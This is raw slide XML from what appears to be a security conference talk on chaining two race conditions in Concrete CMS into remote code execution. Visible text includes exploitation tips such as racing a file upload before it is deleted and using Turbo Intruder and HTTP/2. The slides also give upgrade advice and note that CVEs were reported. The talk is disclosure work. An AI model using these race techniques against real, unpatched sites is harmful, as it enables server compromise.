                    <a:pt x="4695317" y="5572125"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5008880" y="5478780"/>
                    <a:pt x="5317744" y="5369560"/>
                    <a:pt x="5619750" y="5236464"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3470783" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3455289" y="0"/>
                    <a:pt x="3440049" y="381"/>
                    <a:pt x="3425063" y="1143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3289808" y="2794"/>
                    <a:pt x="3175000" y="7747"/>
                    <a:pt x="3058668" y="19304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2942336" y="30861"/>
                    <a:pt x="2826893" y="46736"/>
                    <a:pt x="2712212" y="70104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100072" y="194564"/>
                    <a:pt x="1549400" y="453136"/>
                    <a:pt x="1073912" y="867156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="505714" y="1361313"/>
                    <a:pt x="134366" y="1972183"/>
                    <a:pt x="27432" y="2735199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11938" y="2844800"/>
                    <a:pt x="0" y="2955163"/>
                    <a:pt x="33274" y="3064891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46990" y="3108579"/>
                    <a:pt x="57150" y="3153410"/>
                    <a:pt x="63627" y="3199003"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99695" y="3466084"/>
                    <a:pt x="181102" y="3724656"/>
                    <a:pt x="304165" y="3963416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530352" y="4407027"/>
                    <a:pt x="858012" y="4760468"/>
                    <a:pt x="1250950" y="5053965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1630553" y="5337302"/>
                    <a:pt x="2050669" y="5535930"/>
                    <a:pt x="2498217" y="5678932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2758313" y="5763895"/>
                    <a:pt x="3026029" y="5821807"/>
                    <a:pt x="3297428" y="5852287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3408553" y="5863971"/>
                    <a:pt x="3520313" y="5864097"/>
                    <a:pt x="3631057" y="5877052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3721608" y="5887466"/>
                    <a:pt x="3812540" y="5892800"/>
                    <a:pt x="3903472" y="5892800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3908425" y="5892800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4070477" y="5892672"/>
                    <a:pt x="4232402" y="5876036"/>
                    <a:pt x="4391787" y="5843143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4847082" y="5750814"/>
                    <a:pt x="5263515" y="5561838"/>
                    <a:pt x="5650992" y="5305297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5889117" y="5147690"/>
                    <a:pt x="6114415" y="4971161"/>
                    <a:pt x="6352159" y="4812538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6597650" y="4650994"/>
                    <a:pt x="6807200" y="4438650"/>
                    <a:pt x="6966839" y="4189095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7156196" y="3897630"/>
                    <a:pt x="7242048" y="3548888"/>
                    <a:pt x="7210171" y="3200654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7200900" y="3110611"/>
                    <a:pt x="7201153" y="3019679"/>
                    <a:pt x="7211187" y="2929763"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7233031" y="2763774"/>
                    <a:pt x="7247382" y="2599182"/>
                    <a:pt x="7231507" y="2432050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7210806" y="2204974"/>
                    <a:pt x="7144765" y="1984629"/>
                    <a:pt x="7037832" y="1784477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6871335" y="1472565"/>
                    <a:pt x="6632321" y="1227074"/>
                    <a:pt x="6354190" y="1018413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5997194" y="750316"/>
                    <a:pt x="5601334" y="558800"/>
                    <a:pt x="5186807" y="404368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4755896" y="243713"/>
                    <a:pt x="4312412" y="130683"/>
                    <a:pt x="3861053" y="47371"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3727450" y="22606"/>
                    <a:pt x="3593719" y="0"/>
                    <a:pt x="3470783" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill rotWithShape="0">
              <a:blip r:embed="rId5"/>
              <a:srcRect/>
              <a:stretch/>
            </a:blip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08" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7139520" y="1043280"/>
            <a:ext cx="4476240" cy="630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958"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="458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-</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="458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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5037120" y="6363360"/>
            <a:ext cx="210024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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7139520" y="1869120"/>
            <a:ext cx="4476240" cy="2518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958"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="455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2nd race trigger the uploaded file before deletion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="455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Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344160" y="3429000"/>
            <a:ext cx="11544120" cy="1924920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 11544120"/>
              <a:gd name="textAreaRight" fmla="*/ 11544480 w 11544120"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 1924920"/>
              <a:gd name="textAreaBottom" fmla="*/ 1925280 h 1924920"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="11544300" h="1925204">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11544300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11544300" y="1925204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192520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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604080" y="714240"/>
            <a:ext cx="11384640" cy="839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6610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="52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–The Glorious Win </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287160" y="1477080"/>
            <a:ext cx="5617080" cy="828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6528"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600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Remote exploit with Turbo Intruder </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295240" y="6370560"/>
            <a:ext cx="192096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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374040" y="128160"/>
            <a:ext cx="11818440" cy="747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5890"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="42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– Debugging Tips</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295240" y="6384240"/>
            <a:ext cx="192132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TextBox 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376560" y="1386720"/>
            <a:ext cx="10888920" cy="483209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t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-216000" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="28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the timeout for curl is 60s, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="28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dont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="28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sleep() more than 60s in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="28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test.php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indent="-216000" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="28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use http2 if possible (for speed, it’s easier to win the race conditions)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indent="-216000" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="28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use tail -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="28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access_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="28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and tail -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="28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error_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="28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to monitor for any errors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indent="-216000" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="28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check that your upload request from request.txt is still a valid session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indent="-216000" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="28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the upload request must come from a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> by default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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972000" y="346320"/>
            <a:ext cx="9700200" cy="343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704"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="541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–Solution?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658440" y="1925640"/>
            <a:ext cx="10698480" cy="234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343080" indent="-343080" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="5F4776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Upgrade to latest version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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2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5F4776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5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Our Team has reported many issues (CVEs were assigned)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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2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5F4776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5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Concrete CMS team has been great to work with!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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2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TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4896000" y="6297840"/>
            <a:ext cx="219204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25" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7098840" y="1017720"/>
            <a:ext cx="3571560" cy="3557520"/>
            <a:chOff x="7098840" y="1017720"/>
            <a:chExt cx="3571560" cy="3557520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7098840" y="1017720"/>
              <a:ext cx="3571560" cy="3557520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 3571560"/>
                <a:gd name="textAreaRight" fmla="*/ 3571920 w 3571560"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 3557520"/>
                <a:gd name="textAreaBottom" fmla="*/ 3557880 h 3557520"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="6438900" h="6413500">
                  <a:moveTo>
                    <a:pt x="3176524" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3146679" y="127"/>
                    <a:pt x="3116961" y="635"/>
                    <a:pt x="3087243" y="1524"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2310130" y="24003"/>
                    <a:pt x="1586103" y="286131"/>
                    <a:pt x="1015619" y="744728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376047" y="1258189"/>
                    <a:pt x="0" y="1996059"/>
                    <a:pt x="0" y="2744851"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="3493516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1755521" y="3493516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1755521" y="2744851"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1755521" y="2391791"/>
                    <a:pt x="1918462" y="2070862"/>
                    <a:pt x="2219452" y="1835658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2489708" y="1624330"/>
                    <a:pt x="2830703" y="1499235"/>
                    <a:pt x="3197098" y="1499235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3238754" y="1499235"/>
                    <a:pt x="3280664" y="1500886"/>
                    <a:pt x="3322828" y="1504188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4050157" y="1546860"/>
                    <a:pt x="4639437" y="2049653"/>
                    <a:pt x="4689475" y="2670048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4727067" y="3204845"/>
                    <a:pt x="4351020" y="3707384"/>
                    <a:pt x="3761740" y="3910711"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2896489" y="4199382"/>
                    <a:pt x="2344801" y="4884039"/>
                    <a:pt x="2344801" y="5664835"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2344801" y="6413500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100195" y="6413500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100195" y="5664835"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4100195" y="5504307"/>
                    <a:pt x="4225544" y="5365242"/>
                    <a:pt x="4413631" y="5301107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5639562" y="4884801"/>
                    <a:pt x="6436106" y="3871087"/>
                    <a:pt x="6438900" y="2753868"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6438900" y="2753868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6438900" y="2742184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6438900" y="2742184"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6438773" y="2686177"/>
                    <a:pt x="6436614" y="2630043"/>
                    <a:pt x="6432423" y="2573655"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6332220" y="1193927"/>
                    <a:pt x="5040503" y="92329"/>
                    <a:pt x="3423031" y="6731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3353562" y="2540"/>
                    <a:pt x="3284347" y="381"/>
                    <a:pt x="3215640" y="0"/>
                  </a:cubicBez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27" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8402040" y="4807800"/>
            <a:ext cx="972000" cy="830880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 972000"/>
              <a:gd name="textAreaRight" fmla="*/ 972360 w 972000"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 830880"/>
              <a:gd name="textAreaBottom" fmla="*/ 831240 h 830880"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="972213" h="831313">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="972214" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972214" y="831312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8313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TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2017440" y="186120"/>
            <a:ext cx="1594800" cy="3191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5129"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1795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Q</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="179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TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240880" y="1487520"/>
            <a:ext cx="1562040" cy="3539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7865"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="199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A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="199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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4141080" y="2492640"/>
            <a:ext cx="802080" cy="156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2297"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="878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&amp;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="878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Freeform 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="685764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0CF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320040"/>
            <a:ext cx="5632704" cy="6400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8640" y="128016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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Scan for Slides +</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Research Resources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560320"/>
            <a:ext cx="5303520" cy="2560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sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>Concrete Evidence - Two Races, One RCE (this talk)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>VESTA Takeover - PortSwigger Top 10 nominee, BlueHat 2025</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>Feeld App - hacking a 50M+ user dating app, DEFCON 33</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>✓  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:rPr>
              <a:t>Technical research blog with full write-ups and CVEs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766560" y="457200"/>
            <a:ext cx="4389120" cy="5120640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EDEA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7" name="Picture 6" descr="dso-qr-cod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320" y="731520"/>
            <a:ext cx="3657600" cy="3657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66560" y="4526280"/>
            <a:ext cx="438912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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>fortbridge.co.uk/dso-resources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66560" y="4892040"/>
            <a:ext cx="43891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200">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Point your phone camera at the QR code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784848"/>
            <a:ext cx="12191695" cy="73152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F89AB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48640" y="6126480"/>
            <a:ext cx="4572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>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Kanit"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>FORTBRIDGE - Offensive Security Experts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831960" y="336600"/>
            <a:ext cx="4266000" cy="85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6710"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5104800" y="6294240"/>
            <a:ext cx="206100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TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831960" y="1716840"/>
            <a:ext cx="10987920" cy="621965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6270"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS) Bold"/>
              </a:rPr>
              <a:t>Adrian Tiron</a:t>
            </a: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2786"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Founder &amp; Principal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="0" strike="noStrike" spc="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> @FORTBRIDGE</a:t>
            </a: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en-US" sz="2300" b="1" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Certifications: </a:t>
            </a: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en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>OSCP/OSEP/OSWE/CRTO/CRTL/CAISP etc.</a:t>
            </a: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5715"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Conference Speaker</a:t>
            </a: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en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>BSides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> Dresden, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>BSides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> Kent, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>BlueHatIL</a:t>
            </a:r>
            <a:r>
